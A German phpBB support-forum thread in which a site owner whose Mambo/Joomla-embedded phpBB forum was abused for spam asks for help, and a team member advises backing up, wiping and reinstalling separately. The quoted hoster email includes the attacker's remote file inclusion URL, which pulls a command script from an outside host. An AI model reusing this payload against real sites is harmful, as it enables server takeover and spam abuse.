Bekam gerade folgende Mail :
Sie haben unsichere Scripte auf ihrer Webseite, die andere Personen zum
Spam-Versand nutzen. Um den Versand über ihre Scripte einzustellen, bitte ich
Sie die betreffenden Scripte zu fixen oder zu entfernen.
Im konkreten Fall handelt es sich um folgende(s) Script(e):
PHPBB
Der Angreifer kam über folgenden Link:
/components/com_forum/downloads.php?phpbb_root_path=http://geo.ya.com/z1x2c3v4/cmd.txt%3f&cmd=id
was kann ich tun außer die datei zu löschen , gibt es ein fix ...
Das PHP forum läuft und Jambo / Mambo
Webseite gesperrt Spam über PHPbb Forum
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
-
- Mitglied
- Beiträge: 7
- Registriert: 18.01.2005 11:02
- Mahony
- Ehemaliges Teammitglied
- Beiträge: 12257
- Registriert: 17.11.2005 22:33
- Wohnort: Ostfildern Kemnat
- Kontaktdaten:
Hallo
Welche phpbb - Version läuft denn bei dir? Hast du das aktuellste Joomla (oder Mambo) installiert? Man könnte das Forum von Joomla/Mambo trennen und separat installieren (danach über den Wrapper ins Joomla/Mambo integrieren). Das hätte den Vorteil, dass du dann dein Forum immer aktuell halten könntest und nicht auf die Entwickler von Joomla/Mambo angewiesen wärest. Ausserdem könntest du auch zusätzliche MODs integrieren und/oder auch aktuell halten.
Grüße: Mahony
Welche phpbb - Version läuft denn bei dir? Hast du das aktuellste Joomla (oder Mambo) installiert? Man könnte das Forum von Joomla/Mambo trennen und separat installieren (danach über den Wrapper ins Joomla/Mambo integrieren). Das hätte den Vorteil, dass du dann dein Forum immer aktuell halten könntest und nicht auf die Entwickler von Joomla/Mambo angewiesen wärest. Ausserdem könntest du auch zusätzliche MODs integrieren und/oder auch aktuell halten.
Grüße: Mahony
Wer fragt, ist ein Narr für fünf Minuten, wer nicht fragt, ist ein Narr für immer.
-
- Mitglied
- Beiträge: 7
- Registriert: 18.01.2005 11:02
danke das mit dem seperaten instal vom forum hatte ich auch schon dran gedacht leider zu spät ..
Jambo ist aktuell zur php version kann ich nicht sagen gesperrt heißt leider auch ich komme nichtmal in das admin interface
Jambo ist aktuell zur php version kann ich nicht sagen gesperrt heißt leider auch ich komme nichtmal in das admin interface
Zuletzt geändert von rmzcreative am 10.07.2006 19:46, insgesamt 1-mal geändert.
- Mahony
- Ehemaliges Teammitglied
- Beiträge: 12257
- Registriert: 17.11.2005 22:33
- Wohnort: Ostfildern Kemnat
- Kontaktdaten:
Was genau meinst du denn damit? Ist dein Webspace gesperrt? Hast du FTP - Zugriff?rmzcreative hat geschrieben:danke das mit dem seperaten instal vom forum hatte ich auch schon dran gedacht leider zu spät ..
Jambo ist aktuell zur php erion klann ich nicht sagen gesperrt heißt leider auch ich komme nichtmal in das admin interface
P.S. Bitte auf eine ordentliche Rechtschreibung achten - sonst wird es schwer zu helfen (da das geschriebene nicht sehr gut verständlich ist).
Wer fragt, ist ein Narr für fünf Minuten, wer nicht fragt, ist ein Narr für immer.
-
- Mitglied
- Beiträge: 7
- Registriert: 18.01.2005 11:02
- Mahony
- Ehemaliges Teammitglied
- Beiträge: 12257
- Registriert: 17.11.2005 22:33
- Wohnort: Ostfildern Kemnat
- Kontaktdaten:
Hallo
Mach am besten ein Backup deiner Dateien und der Datenbank. Danach alles von deinem Webspace löschen. Dann einen lokalen Server aufsetzen und deine Webseite dort bearbeiten (also Joomla und phpbb trennen). Kontaktiere deinen Hoster und bitte um Freigabe der Domain (also die Domain zu entsperren). Wenn du alles lokal fertiggestellt hast, hochladen und Spass haben.
Grüße: Mahony
Mach am besten ein Backup deiner Dateien und der Datenbank. Danach alles von deinem Webspace löschen. Dann einen lokalen Server aufsetzen und deine Webseite dort bearbeiten (also Joomla und phpbb trennen). Kontaktiere deinen Hoster und bitte um Freigabe der Domain (also die Domain zu entsperren). Wenn du alles lokal fertiggestellt hast, hochladen und Spass haben.
Grüße: Mahony
Wer fragt, ist ein Narr für fünf Minuten, wer nicht fragt, ist ein Narr für immer.
-
- Mitglied
- Beiträge: 7
- Registriert: 18.01.2005 11:02